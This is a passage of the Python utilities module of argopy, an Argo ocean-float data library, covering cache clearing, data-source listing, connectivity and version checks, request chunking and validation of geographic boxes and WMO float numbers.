collectionsAbc = collections
path2pkl = pkg_resources.resource_filename("argopy", "assets/")
try:
collectionsAbc = collections.abc
except AttributeError:
collectionsAbc = collections
def clear_cache(fs=None):
""" Delete argopy cache folder content """
if os.path.exists(OPTIONS["cachedir"]):
# shutil.rmtree(OPTIONS["cachedir"])
for filename in os.listdir(OPTIONS["cachedir"]):
file_path = os.path.join(OPTIONS["cachedir"], filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print("Failed to delete %s. Reason: %s" % (file_path, e))
if fs:
fs.clear_cache()
def load_dict(ptype):
if ptype == "profilers":
with open(os.path.join(path2pkl, "dict_profilers.pickle"), "rb") as f:
loaded_dict = pickle.load(f)
return loaded_dict
elif ptype == "institutions":
with open(os.path.join(path2pkl, "dict_institutions.pickle"), "rb") as f:
loaded_dict = pickle.load(f)
return loaded_dict
else:
raise ValueError("Invalid dictionary pickle file")
def mapp_dict(Adictionnary, Avalue):
if Avalue not in Adictionnary:
return "Unknown"
else:
return Adictionnary[Avalue]
def list_available_data_src():
""" List all available data sources """
sources = {}
try:
from .data_fetchers import erddap_data as Erddap_Fetchers
sources["erddap"] = Erddap_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the ERDDAP data fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
try:
from .data_fetchers import localftp_data as LocalFTP_Fetchers
sources["localftp"] = LocalFTP_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the local FTP data fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
try:
from .data_fetchers import argovis_data as ArgoVis_Fetchers
sources["argovis"] = ArgoVis_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the ArgoVis data fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
# return dict(sorted(sources.items()))
return sources
def list_available_index_src():
""" List all available index sources """
AVAILABLE_SOURCES = {}
try:
from .data_fetchers import erddap_index as Erddap_Fetchers
AVAILABLE_SOURCES["erddap"] = Erddap_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the ERDDAP index fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
try:
from .data_fetchers import localftp_index as LocalFTP_Fetchers
AVAILABLE_SOURCES["localftp"] = LocalFTP_Fetchers
except Exception:
warnings.warn(
"An error occurred while loading the local FTP index fetcher, "
"it will not be available !\n%s\n%s"
% (sys.exc_info()[0], sys.exc_info()[1])
)
pass
return AVAILABLE_SOURCES
def list_standard_variables():
""" List of variables for standard users """
return [
"DATA_MODE",
"LATITUDE",
"LONGITUDE",
"POSITION_QC",
"DIRECTION",
"PLATFORM_NUMBER",
"CYCLE_NUMBER",
"PRES",
"TEMP",
"PSAL",
"PRES_QC",
"TEMP_QC",
"PSAL_QC",
"PRES_ADJUSTED",
"TEMP_ADJUSTED",
"PSAL_ADJUSTED",
"PRES_ADJUSTED_QC",
"TEMP_ADJUSTED_QC",
"PSAL_ADJUSTED_QC",
"PRES_ADJUSTED_ERROR",
"TEMP_ADJUSTED_ERROR",
"PSAL_ADJUSTED_ERROR",
"JULD",
"JULD_QC",
"TIME",
"TIME_QC",
"CONFIG_MISSION_NUMBER",
]
def list_multiprofile_file_variables():
""" List of variables in a netcdf multiprofile file.
This is for files created by GDAC under <DAC>/<WMO>/<WMO>_prof.nc
"""
return [
"CONFIG_MISSION_NUMBER",
"CYCLE_NUMBER",
"DATA_CENTRE",
"DATA_MODE",
"DATA_STATE_INDICATOR",
"DATA_TYPE",
"DATE_CREATION",
"DATE_UPDATE",
"DC_REFERENCE",
"DIRECTION",
"FIRMWARE_VERSION",
"FLOAT_SERIAL_NO",
"FORMAT_VERSION",
"HANDBOOK_VERSION",
"HISTORY_ACTION",
"HISTORY_DATE",
"HISTORY_INSTITUTION",
"HISTORY_PARAMETER",
"HISTORY_PREVIOUS_VALUE",
"HISTORY_QCTEST",
"HISTORY_REFERENCE",
"HISTORY_SOFTWARE",
"HISTORY_SOFTWARE_RELEASE",
"HISTORY_START_PRES",
"HISTORY_STEP",
"HISTORY_STOP_PRES",
"JULD",
"JULD_LOCATION",
"JULD_QC",
"LATITUDE",
"LONGITUDE",
"PARAMETER",
"PI_NAME",
"PLATFORM_NUMBER",
"PLATFORM_TYPE",
"POSITIONING_SYSTEM",
"POSITION_QC",
"PRES",
"PRES_ADJUSTED",
"PRES_ADJUSTED_ERROR",
"PRES_ADJUSTED_QC",
"PRES_QC",
"PROFILE_PRES_QC",
"PROFILE_PSAL_QC",
"PROFILE_TEMP_QC",
"PROJECT_NAME",
"PSAL",
"PSAL_ADJUSTED",
"PSAL_ADJUSTED_ERROR",
"PSAL_ADJUSTED_QC",
"PSAL_QC",
"REFERENCE_DATE_TIME",
"SCIENTIFIC_CALIB_COEFFICIENT",
"SCIENTIFIC_CALIB_COMMENT",
"SCIENTIFIC_CALIB_DATE",
"SCIENTIFIC_CALIB_EQUATION",
"STATION_PARAMETERS",
"TEMP",
"TEMP_ADJUSTED",
"TEMP_ADJUSTED_ERROR",
"TEMP_ADJUSTED_QC",
"TEMP_QC",
"VERTICAL_SAMPLING_SCHEME",
"WMO_INST_TYPE",
]
def check_localftp(path, errors: str = "ignore"):
""" Check if the path has the expected GDAC ftp structure
Check if the path is structured like:
.
└── dac
├── aoml
├── ...
├── coriolis
├── ...
├── meds
└── nmdis
Parameters
----------
path: str
Path name to check
errors: str
"ignore" or "raise" (or "warn"
Returns
-------
checked: boolean
True if at least one DAC folder is found under path/dac/<dac_name>
False otherwise
"""
dacs = [
"aoml",
"bodc",
"coriolis",
"csio",
"csiro",
"incois",
"jma",
"kma",
"kordi",
"meds",
"nmdis",
]
# Case 1:
check1 = (
os.path.isdir(path)
and os.path.isdir(os.path.join(path, "dac"))
and np.any([os.path.isdir(os.path.join(path, "dac", dac)) for dac in dacs])
)
if check1:
return True
elif errors == "raise":
# This was possible up to v0.1.3:
check2 = os.path.isdir(path) and np.any(
[os.path.isdir(os.path.join(path, dac)) for dac in dacs]
)
if check2:
raise FtpPathError(
"This path is no longer GDAC compliant for argopy.\n"
"Please make sure you point toward a path with a 'dac' folder:\n%s"
% path
)
else:
raise FtpPathError("This path is not GDAC compliant:\n%s" % path)
elif errors == "warn":
# This was possible up to v0.1.3:
check2 = os.path.isdir(path) and np.any(
[os.path.isdir(os.path.join(path, dac)) for dac in dacs]
)
if check2:
warnings.warn(
"This path is no longer GDAC compliant for argopy. This will raise an error in the future.\n"
"Please make sure you point toward a path with a 'dac' folder:\n%s"
% path
)
return False
else:
warnings.warn("This path is not GDAC compliant:\n%s" % path)
return False
else:
return False
def get_sys_info():
"Returns system information as a dict"
blob = []
# get full commit hash
commit = None
if os.path.isdir(".git") and os.path.isdir("argopy"):
try:
pipe = subprocess.Popen(
'git log --format="%H" -n 1'.split(" "),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
so, serr = pipe.communicate()
except Exception:
pass
else:
if pipe.returncode == 0:
commit = so
try:
commit = so.decode("utf-8")
except ValueError:
pass
commit = commit.strip().strip('"')
blob.append(("commit", commit))
try:
(sysname, nodename, release, version_, machine, processor) = platform.uname()
blob.extend(
[
("python", sys.version),
("python-bits", struct.calcsize("P") * 8),
("OS", "%s" % (sysname)),
("OS-release", "%s" % (release)),
("machine", "%s" % (machine)),
("processor", "%s" % (processor)),
("byteorder", "%s" % sys.byteorder),
("LC_ALL", "%s" % os.environ.get("LC_ALL", "None")),
("LANG", "%s" % os.environ.get("LANG", "None")),
("LOCALE", "%s.%s" % locale.getlocale()),
]
)
except Exception:
pass
return blob
def netcdf_and_hdf5_versions():
libhdf5_version = None
libnetcdf_version = None
try:
import netCDF4
libhdf5_version = netCDF4.__hdf5libversion__
libnetcdf_version = netCDF4.__netcdf4libversion__
except ImportError:
try:
import h5py
libhdf5_version = h5py.version.hdf5_version
except ImportError:
pass
return [("libhdf5", libhdf5_version), ("libnetcdf", libnetcdf_version)]
def show_versions(file=sys.stdout): # noqa: C901
""" Print the versions of argopy and its dependencies
Parameters
----------
file : file-like, optional
print to the given file-like object. Defaults to sys.stdout.
"""
sys_info = get_sys_info()
try:
sys_info.extend(netcdf_and_hdf5_versions())
except Exception as e:
print(f"Error collecting netcdf / hdf5 version: {e}")
deps = [
# (MODULE_NAME, f(mod) -> mod version)
# In REQUIREMENTS:
("argopy", lambda mod: mod.__version__),
("xarray", lambda mod: mod.__version__),
("scipy", lambda mod: mod.__version__),
("sklearn", lambda mod: mod.__version__),
("netCDF4", lambda mod: mod.__version__),
("dask", lambda mod: mod.__version__),
("toolz", lambda mod: mod.__version__),
("erddapy", lambda mod: mod.__version__),
("fsspec", lambda mod: mod.__version__),
("gsw", lambda mod: mod.__version__),
("aiohttp", lambda mod: mod.__version__),
#
("bottleneck", lambda mod: mod.__version__),
("cartopy", lambda mod: mod.__version__),
("cftime", lambda mod: mod.__version__),
("conda", lambda mod: mod.__version__),
("distributed", lambda mod: mod.__version__),
("IPython", lambda mod: mod.__version__),
("iris", lambda mod: mod.__version__),
("matplotlib", lambda mod: mod.__version__),
("nc_time_axis", lambda mod: mod.__version__),
("numpy", lambda mod: mod.__version__),
("pandas", lambda mod: mod.__version__),
("packaging", lambda mod: mod.__version__),
("pip", lambda mod: mod.__version__),
("PseudoNetCDF", lambda mod: mod.__version__),
("pytest", lambda mod: mod.__version__),
("seaborn", lambda mod: mod.__version__),
("setuptools", lambda mod: mod.__version__),
("sphinx", lambda mod: mod.__version__),
("zarr", lambda mod: mod.__version__),
]
deps_blob = list()
for (modname, ver_f) in deps:
try:
if modname in sys.modules:
mod = sys.modules[modname]
else:
mod = importlib.import_module(modname)
except Exception:
deps_blob.append((modname, None))
else:
try:
ver = ver_f(mod)
deps_blob.append((modname, ver))
except Exception:
deps_blob.append((modname, "installed"))
print("\nINSTALLED VERSIONS", file=file)
print("------------------", file=file)
for k, stat in sys_info:
print(f"{k}: {stat}", file=file)
print("", file=file)
for k, stat in deps_blob:
print(f"{k}: {stat}", file=file)
def show_options(file=sys.stdout): # noqa: C901
""" Print options of argopy
Parameters
----------
file : file-like, optional
print to the given file-like object. Defaults to sys.stdout.
"""
print("\nARGOPY OPTIONS", file=file)
print("--------------", file=file)
opts = copy.deepcopy(OPTIONS)
opts = dict(sorted(opts.items()))
for k, v in opts.items():
print(f"{k}: {v}", file=file)
def isconnected(host="https://www.ifremer.fr"):
""" check if we have a live internet connection
Parameters
----------
host: str
URL to use, 'https://www.ifremer.fr' by default
Returns
-------
bool
"""
if "http" in host or "ftp" in host:
try:
urllib.request.urlopen(host, timeout=1) # Python 3.x
return True
except Exception:
return False
else:
return os.path.exists(host)
def isAPIconnected(src="erddap", data=True):
""" Check if a source API is alive or not
The API is connected when it has a live URL or valid folder path.
Parameters
----------
src: str
The data or index source name, 'erddap' default
data: bool
If True check the data fetcher (default), if False, check the index fetcher
Returns
-------
bool
"""
if data:
list_src = list_available_data_src()
else:
list_src = list_available_index_src()
if src in list_src and getattr(
list_src[src], "api_server_check", None
):
if "localftp" in src:
# This is a special case because the source here is a local folder
result = check_localftp(OPTIONS["local_ftp"])
else:
result = isconnected(list_src[src].api_server_check)
return result
else:
raise InvalidFetcher
def erddap_ds_exists(ds: str = "ArgoFloats", erddap: str = 'https://www.ifremer.fr/erddap') -> bool:
""" Check if a dataset exists on a remote erddap server
return a bool
Parameter
---------
ds: str
Name of the erddap dataset to check (default: 'ArgoFloats')
erddap: str
Url of the erddap server (default: 'https://www.ifremer.fr/erddap')
Return
------
bool
"""
with httpstore(timeout=OPTIONS['api_timeout']).open("".join([erddap, "/info/index.json"])) as of:
erddap_index = json.load(of)
return ds in [row[-1] for row in erddap_index["table"]["rows"]]
def badge(label="label", message="message", color="green", insert=False):
""" Return or insert shield.io badge image
Use the shields.io service to create a badge image
https://img.shields.io/static/v1?label=<LABEL>&message=<MESSAGE>&color=<COLOR>
Parameters
----------
label: str
Left side badge text
message: str
Right side badge text
color: str
Right side background color
insert: bool
Return url to badge image (False, default) or directly insert the image with HTML (True)
Returns
-------
str or IPython.display.Image
"""
from IPython.display import Image
url = (
"https://img.shields.io/static/v1?style=flat-square&label={}&message={}&color={}"
).format
img = url(urllib.parse.quote(label), urllib.parse.quote(message), color)
if not insert:
return img
else:
return Image(url=img)
def fetch_status(stdout: str = "html", insert: bool = True):
""" Fetch and report web API status
Parameters
----------
stdout: str
Format of the results, default is 'html'. Otherwise a simple string.
insert: bool
Print or display results directly in stdout format.
Returns
-------
IPython.display.HTML or str
"""
results = {}
list_src = list_available_data_src()
for api, mod in list_src.items():
if getattr(mod, "api_server_check", None):
# status = isconnected(mod.api_server_check)
status = isAPIconnected(api)
if api=='localftp' and OPTIONS['local_ftp'] == '-':
message = "ok" if status else "path undefined !"
else:
# message = "up" if status else "down"
message = "ok" if status else "offline"
results[api] = {"value": status, "message": message}
if "IPython" in sys.modules and stdout == "html":
cols = []
for api in sorted(results.keys()):
color = "green" if results[api]["value"] else "orange"
if isconnected():
# img = badge("src='%s'" % api, message=results[api]['message'], color=color, insert=False)
# img = badge(label="argopy src", message="%s is %s" %
# (api, results[api]['message']), color=color, insert=False)
img = badge(
label="src %s is" % api,
message="%s" % results[api]["message"],
color=color,
insert=False,
)
html = ('<td><img src="{}"></td>').format(img)
else:
# html = "<th>src %s is:</th><td>%s</td>" % (api, results[api]['message'])
html = (
"<th><div>src %s is:</div></th><td><div style='color:%s;'>%s</div></td>"
% (api, color, results[api]["message"])
)
cols.append(html)
this_HTML = ("<table><tr>{}</tr></table>").format("".join(cols))
if insert:
from IPython.display import HTML, display
return display(HTML(this_HTML))
else:
return this_HTML
else:
rows = []
for api in sorted(results.keys()):
# rows.append("argopy src %s: %s" % (api, results[api]['message']))
rows.append("src %s is: %s" % (api, results[api]["message"]))
txt = "\n".join(rows)
if insert:
print(txt)
else:
return txt
class monitor_status:
""" Monitor data source status with a refresh rate """
def __init__(self, refresh=1):
import ipywidgets as widgets
self.refresh_rate = refresh
self.text = widgets.HTML(
value=fetch_status(stdout="html", insert=False),
placeholder="",
description="",
)
self.start()
def work(self):
while True:
time.sleep(self.refresh_rate)
self.text.value = fetch_status(stdout="html", insert=False)
def start(self):
from IPython.display import display
thread = threading.Thread(target=self.work)
display(self.text)
thread.start()
# def open_etopo1(box, res="l"):
# """ Download ETOPO for a box
#
# Parameters
# ----------
# box: [xmin, xmax, ymin, ymax]
#
# Returns
# -------
# xarray.Dataset
# """
# # This function is in utilities to anticipate usage outside of plotting, eg interpolation, grounding detection
# resx, resy = 0.1, 0.1
# if res == "h":
# resx, resy = 0.016, 0.016
#
# uri = (
# "https://gis.ngdc.noaa.gov/mapviewer-support/wcs-proxy/wcs.groovy?filename=etopo1.nc"
# "&request=getcoverage&version=1.0.0&service=wcs&coverage=etopo1&CRS=EPSG:4326&format=netcdf"
# "&resx={}&resy={}"
# "&bbox={}"
# ).format
# thisurl = uri(
# resx, resy, ",".join([str(b) for b in [box[0], box[2], box[1], box[3]]])
# )
# ds = httpstore(cache=True).open_dataset(thisurl)
# da = ds["Band1"].rename("topo")
# for a in ds.attrs:
# da.attrs[a] = ds.attrs[a]
# da.attrs["Data source"] = "https://maps.ngdc.noaa.gov/viewers/wcs-client/"
# da.attrs["URI"] = thisurl
# return da
#
# From xarrayutils : https://github.com/jbusecke/xarrayutils/blob/master/xarrayutils/vertical_coordinates.py
# Direct integration of those 2 functions to minimize dependencies and possibility of tuning them to our needs
#
def linear_interpolation_remap(
z, data, z_regridded, z_dim=None, z_regridded_dim="regridded", output_dim="remapped"
):
# interpolation called in xarray ufunc
def _regular_interp(x, y, target_values):
# remove all nans from input x and y
idx = np.logical_or(np.isnan(x), np.isnan(y))
x = x[~idx]
y = y[~idx]
# Need at least 5 points in the profile to interpolate, otherwise, return NaNs
if len(y) < 5:
interpolated = np.empty(len(target_values))
interpolated[:] = np.nan
else:
# replace nans in target_values with out of bound Values (just in case)
target_values = np.where(
~np.isnan(target_values), target_values, np.nanmax(x) + 1
)
# Interpolate with fill value parameter to extend min pressure toward 0
interpolated = interpolate.interp1d(
x, y, bounds_error=False, fill_value=(y[0], y[-1])
)(target_values)
return interpolated
# infer dim from input
if z_dim is None:
if len(z.dims) != 1:
raise RuntimeError("if z_dim is not specified, x must be a 1D array.")
dim = z.dims[0]
else:
dim = z_dim
# if dataset is passed drop all data_vars that dont contain dim
if isinstance(data, xr.Dataset):
raise ValueError("Dataset input is not supported yet")
# TODO: for a dataset input just apply the function for each appropriate array
if version.parse(xr.__version__) > version.parse("0.15.0"):
kwargs = dict(
input_core_dims=[[dim], [dim], [z_regridded_dim]],
output_core_dims=[[output_dim]],
vectorize=True,
dask="parallelized",
output_dtypes=[data.dtype],
dask_gufunc_kwargs={'output_sizes': {output_dim: len(z_regridded[z_regridded_dim])}},
)
else:
kwargs = dict(
input_core_dims=[[dim], [dim], [z_regridded_dim]],
output_core_dims=[[output_dim]],
vectorize=True,
dask="parallelized",
output_dtypes=[data.dtype],
output_sizes={output_dim: len(z_regridded[z_regridded_dim])},
)
remapped = xr.apply_ufunc(_regular_interp, z, data, z_regridded, **kwargs)
remapped.coords[output_dim] = z_regridded.rename(
{z_regridded_dim: output_dim}
).coords[output_dim]
return remapped
class Chunker:
""" To chunk fetcher requests """
# Default maximum chunks size for all possible request parameters
default_chunksize = {
"box": {
"lon": 20, # degree
"lat": 20, # degree
"dpt": 500, # meters/db
"time": 3 * 30,
}, # Days
"wmo": {"wmo": 5, "cyc": 100}, # Nb of floats
} # Nb of cycles
def __init__(self, request: dict, chunks: str = "auto", chunksize: dict = {}):
""" Create a request Chunker
Allow to easily split an access point request into chunks
Parameters
----------
request: dict
Access point request to be chunked. One of the following:
- {'box': [lon_min, lon_max, lat_min, lat_max, dpt_min, dpt_max, time_min, time_max]}
- {'box': [lon_min, lon_max, lat_min, lat_max, dpt_min, dpt_max]}
- {'wmo': [wmo1, wmo2, ...], 'cyc': [0,1, ...]}
chunks: 'auto' or dict
Dictionary with request access point as keys and number of chunks to create as values.
Eg: {'wmo':10} will create a maximum of 10 chunks along WMOs.
chunksize: dict, optional
Dictionary with request access point as keys and chunk size as values (used as maximum values in
'auto' chunking).
Eg: {'wmo': 5} will create chunks with as many as 5 WMOs each.
"""
self.request = request
if "box" in self.request:
is_box(self.request["box"])
if len(self.request["box"]) == 8:
self.this_chunker = self._chunker_box4d
elif len(self.request["box"]) == 6:
self.this_chunker = self._chunker_box3d
elif "wmo" in self.request:
self.this_chunker = self._chunker_wmo
else:
raise InvalidFetcherAccessPoint(
"'%s' not valid access point" % ",".join(self.request.keys())
)
default = self.default_chunksize[[k for k in self.request.keys()][0]]
if len(chunksize) == 0: # chunksize = {}
chunksize = default
if not isinstance(chunksize, collectionsAbc.Mapping):
raise ValueError("chunksize must be mappable")
else: # merge with default:
chunksize = {**default, **chunksize}
self.chunksize = collections.OrderedDict(sorted(chunksize.items()))
default = {k: "auto" for k in self.chunksize.keys()}
if chunks == "auto": # auto for all
chunks = default
elif len(chunks) == 0: # chunks = {}, i.e. chunk=1 for all
chunks = {k: 1 for k in self.request}
if not isinstance(chunks, collectionsAbc.Mapping):
raise ValueError("chunks must be 'auto' or mappable")
chunks = {**default, **chunks}
self.chunks = collections.OrderedDict(sorted(chunks.items()))
def _split(self, lst, n=1):
"""Yield successive n-sized chunks from lst"""
for i in range(0, len(lst), n):
yield lst[i: i + n]
def _split_list_bychunknb(self, lst, n=1):
"""Split list in n-imposed chunks of similar size
The last chunk may contain more or less element than the others, depending on the size of the list.
"""
res = []
siz = int(np.floor_divide(len(lst), n))
for i in self._split(lst, siz):
res.append(i)
if len(res) > n:
res[n - 1::] = [reduce(lambda i, j: i + j, res[n - 1::])]
return res
def _split_list_bychunksize(self, lst, max_size=1):
"""Split list in chunks of imposed size
The last chunk may contain more or less element than the others, depending on the size of the list.
"""
res = []
for i in self._split(lst, max_size):
res.append(i)
return res
def _split_box(self, large_box, n=1, d="x"): # noqa: C901
"""Split a box domain in one direction in n-imposed equal chunks """
if d == "x":
i_left, i_right = 0, 1
if d == "y":
i_left, i_right = 2, 3
if d == "z":
i_left, i_right = 4, 5
if d == "t":
i_left, i_right = 6, 7
if n == 1:
return [large_box]
boxes = []
if d in ["x", "y", "z"]:
n += 1 # Required because we split in linspace
bins = np.linspace(large_box[i_left], large_box[i_right], n)
for ii, left in enumerate(bins):
if ii < len(bins) - 1:
right = bins[ii + 1]
this_box = large_box.copy()
this_box[i_left] = left
this_box[i_right] = right
boxes.append(this_box)
elif "t" in d:
dates = pd.to_datetime(large_box[i_left: i_right + 1])
date_bounds = [
d.strftime("%Y%m%d%H%M%S")
for d in pd.date_range(dates[0], dates[1], periods=n + 1)
]
for i1, i2 in zip(np.arange(0, n), np.arange(1, n + 1)):
left, right = date_bounds[i1], date_bounds[i2]
this_box = large_box.copy()
this_box[i_left] = left
this_box[i_right] = right
boxes.append(this_box)
return boxes
def _split_this_4Dbox(self, box, nx=1, ny=1, nz=1, nt=1):
box_list = []
split_x = self._split_box(box, n=nx, d="x")
for bx in split_x:
split_y = self._split_box(bx, n=ny, d="y")
for bxy in split_y:
split_z = self._split_box(bxy, n=nz, d="z")
for bxyz in split_z:
split_t = self._split_box(bxyz, n=nt, d="t")
for bxyzt in split_t:
box_list.append(bxyzt)
return box_list
def _split_this_3Dbox(self, box, nx=1, ny=1, nz=1):
box_list = []
split_x = self._split_box(box, n=nx, d="x")
for bx in split_x:
split_y = self._split_box(bx, n=ny, d="y")
for bxy in split_y:
split_z = self._split_box(bxy, n=nz, d="z")
for bxyz in split_z:
box_list.append(bxyz)
return box_list
def _chunker_box4d(self, request, chunks, chunks_maxsize): # noqa: C901
BOX = request["box"]
n_chunks = chunks
for axis, n in n_chunks.items():
if n == "auto":
if axis == "lon":
Lx = BOX[1] - BOX[0]
if Lx > chunks_maxsize["lon"]: # Max box size in longitude
n_chunks["lon"] = int(
np.ceil(np.divide(Lx, chunks_maxsize["lon"]))
)
else:
n_chunks["lon"] = 1
if axis == "lat":
Ly = BOX[3] - BOX[2]
if Ly > chunks_maxsize["lat"]: # Max box size in latitude
n_chunks["lat"] = int(
np.ceil(np.divide(Ly, chunks_maxsize["lat"]))
)
else:
n_chunks["lat"] = 1
if axis == "dpt":
Lz = BOX[5] - BOX[4]
if Lz > chunks_maxsize["dpt"]: # Max box size in depth
n_chunks["dpt"] = int(
np.ceil(np.divide(Lz, chunks_maxsize["dpt"]))
)
else:
n_chunks["dpt"] = 1
if axis == "time":
Lt = np.timedelta64(
pd.to_datetime(BOX[7]) - pd.to_datetime(BOX[6]), "D"
)
MaxLen = np.timedelta64(chunks_maxsize["time"], "D")
if Lt > MaxLen: # Max box size in time
n_chunks["time"] = int(np.ceil(np.divide(Lt, MaxLen)))
else:
n_chunks["time"] = 1
boxes = self._split_this_4Dbox(
BOX,
nx=n_chunks["lon"],
ny=n_chunks["lat"],
nz=n_chunks["dpt"],
nt=n_chunks["time"],
)
return {"chunks": sorted(n_chunks), "values": boxes}
def _chunker_box3d(self, request, chunks, chunks_maxsize):
BOX = request["box"]
n_chunks = chunks
for axis, n in n_chunks.items():
if n == "auto":
if axis == "lon":
Lx = BOX[1] - BOX[0]
if Lx > chunks_maxsize["lon"]: # Max box size in longitude
n_chunks["lon"] = int(
np.floor_divide(Lx, chunks_maxsize["lon"])
)
else:
n_chunks["lon"] = 1
if axis == "lat":
Ly = BOX[3] - BOX[2]
if Ly > chunks_maxsize["lat"]: # Max box size in latitude
n_chunks["lat"] = int(
np.floor_divide(Ly, chunks_maxsize["lat"])
)
else:
n_chunks["lat"] = 1
if axis == "dpt":
Lz = BOX[5] - BOX[4]
if Lz > chunks_maxsize["dpt"]: # Max box size in depth
n_chunks["dpt"] = int(
np.floor_divide(Lz, chunks_maxsize["dpt"])
)
else:
n_chunks["dpt"] = 1
# if axis == 'time':
# Lt = np.timedelta64(pd.to_datetime(BOX[5]) - pd.to_datetime(BOX[4]), 'D')
# MaxLen = np.timedelta64(chunks_maxsize['time'], 'D')
# if Lt > MaxLen: # Max box size in time
# n_chunks['time'] = int(np.floor_divide(Lt, MaxLen))
# else:
# n_chunks['time'] = 1
boxes = self._split_this_3Dbox(
BOX, nx=n_chunks["lon"], ny=n_chunks["lat"], nz=n_chunks["dpt"]
)
return {"chunks": sorted(n_chunks), "values": boxes}
def _chunker_wmo(self, request, chunks, chunks_maxsize):
WMO = request["wmo"]
n_chunks = chunks
if n_chunks["wmo"] == "auto":
wmo_grps = self._split_list_bychunksize(WMO, max_size=chunks_maxsize["wmo"])
else:
n = np.min([n_chunks["wmo"], len(WMO)])
wmo_grps = self._split_list_bychunknb(WMO, n=n)
n_chunks["wmo"] = len(wmo_grps)
return {"chunks": sorted(n_chunks), "values": wmo_grps}
def fit_transform(self):
""" Chunk a fetcher request
Returns
-------
list
"""
self._results = self.this_chunker(self.request, self.chunks, self.chunksize)
# self.chunks = self._results['chunks']
return self._results["values"]
def format_oneline(s, max_width=65):
""" Return a string formatted for a line print """
if len(s) > max_width:
padding = " ... "
n = (max_width - len(padding)) // 2
q = (max_width - len(padding)) % 2
if q == 0:
return "".join([s[0:n], padding, s[-n:]])
else:
return "".join([s[0: n + 1], padding, s[-n:]])
else:
return s
def is_indexbox(box: list, errors="raise"):
""" Check if this array matches a 2d or 3d index box definition
box = [lon_min, lon_max, lat_min, lat_max]
or:
box = [lon_min, lon_max, lat_min, lat_max, datim_min, datim_max]
Parameters
----------
box: list
errors: 'raise'
Returns
-------
bool
"""
tests = {}
# Formats:
tests["index box must be a list"] = lambda b: isinstance(b, list)
tests["index box must be a list with 4 or 6 elements"] = lambda b: len(b) in [4, 6]
error = None
for msg, test in tests.items():
if not test(box):
error = msg
break
if error and errors == "raise":
raise ValueError("%s: %s" % (box, error))
elif error:
return False
else:
# Insert pressure bounds and use full box validator:
tmp_box = box.copy()
tmp_box.insert(4, 0.)
tmp_box.insert(5, 10000.)
return is_box(tmp_box, errors=errors)
def is_box(box: list, errors="raise"):
""" Check if this array matches a 3d or 4d data box definition
box = [lon_min, lon_max, lat_min, lat_max, pres_min, pres_max]
or:
box = [lon_min, lon_max, lat_min, lat_max, pres_min, pres_max, datim_min, datim_max]
Parameters
----------
box: list
errors: 'raise'
Returns
-------
bool
"""
def is_dateconvertible(d):
try:
pd.to_datetime(d)
isit = True
except Exception:
isit = False
return isit
tests = {}
# print(box)
# Formats:
tests["box must be a list"] = lambda b: isinstance(b, list)
tests["box must be a list with 6 or 8 elements"] = lambda b: len(b) in [6, 8]
# Types:
tests["lon_min must be numeric"] = lambda b: (
isinstance(b[0], int) or isinstance(b[0], (np.floating, float))
)
tests["lon_max must be numeric"] = lambda b: (
isinstance(b[1], int) or isinstance(b[1], (np.floating, float))
)
tests["lat_min must be numeric"] = lambda b: (
isinstance(b[2], int) or isinstance(b[2], (np.floating, float))
)
tests["lat_max must be numeric"] = lambda b: (
isinstance(b[3], int) or isinstance(b[3], (np.floating, float))
)
tests["pres_min must be numeric"] = lambda b: (
isinstance(b[4], int) or isinstance(b[4], (np.floating, float))
)
tests["pres_max must be numeric"] = lambda b: (
isinstance(b[5], int) or isinstance(b[5], (np.floating, float))
)
if len(box) == 8:
tests[
"datetim_min must be a string convertible to a Pandas datetime"
] = lambda b: isinstance(b[-2], str) and is_dateconvertible(b[-2])
tests[
"datetim_max must be a string convertible to a Pandas datetime"
] = lambda b: isinstance(b[-1], str) and is_dateconvertible(b[-1])
# Ranges:
tests["lon_min must be in [-180;180] or [0;360]"] = (
lambda b: b[0] >= -180.0 and b[0] <= 360.0
)
tests["lon_max must be in [-180;180] or [0;360]"] = (
lambda b: b[1] >= -180.0 and b[1] <= 360.0
)
tests["lat_min must be in [-90;90]"] = lambda b: b[2] >= -90.0 and b[2] <= 90
tests["lat_max must be in [-90;90]"] = lambda b: b[3] >= -90.0 and b[3] <= 90.0
tests["pres_min must be in [0;10000]"] = lambda b: b[4] >= 0 and b[4] <= 10000
tests["pres_max must be in [0;10000]"] = lambda b: b[5] >= 0 and b[5] <= 10000
# Orders:
tests["lon_max must be larger than lon_min"] = lambda b: b[0] < b[1]
tests["lat_max must be larger than lat_min"] = lambda b: b[2] < b[3]
tests["pres_max must be larger than pres_min"] = lambda b: b[4] < b[5]
if len(box) == 8:
tests["datetim_max must come after datetim_min"] = lambda b: pd.to_datetime(
b[-2]
) < pd.to_datetime(b[-1])
error = None
for msg, test in tests.items():
if not test(box):
error = msg
break
if error and errors == "raise":
raise ValueError("%s: %s" % (box, error))
elif error:
return False
else:
return True
def is_list_of_strings(lst):
return isinstance(lst, list) and all(isinstance(elem, str) for elem in lst)
def is_list_of_dicts(lst):
return all(isinstance(x, dict) for x in lst)
def is_list_of_datasets(lst):
return all(isinstance(x, xr.Dataset) for x in lst)
def is_list_equal(lst1, lst2):
""" Return true if 2 lists contain same elements"""
return len(lst1) == len(lst2) and len(lst1) == sum([1 for i, j in zip(lst1, lst2) if i == j])
def check_wmo(lst):
""" Validate a WMO option and returned it as a list of integers
Parameters
----------
wmo: int
WMO must be an integer or an iterable with elements that can be casted as integers
errors: 'raise'
Returns
-------
list(int)
"""
is_wmo(lst, errors="raise")
# Make sure we deal with a list
if not isinstance(lst, list):
if isinstance(lst, np.ndarray):
lst = list(lst)
else:
lst = [lst]
# Then cast list elements as integers
return [abs(int(x)) for x in lst]
def is_wmo(lst, errors="raise"): # noqa: C901
""" Check if a WMO is valid
Parameters
----------
wmo: int, list(int), array(int)
WMO must be a single or a list of 5/7 digit positive numbers
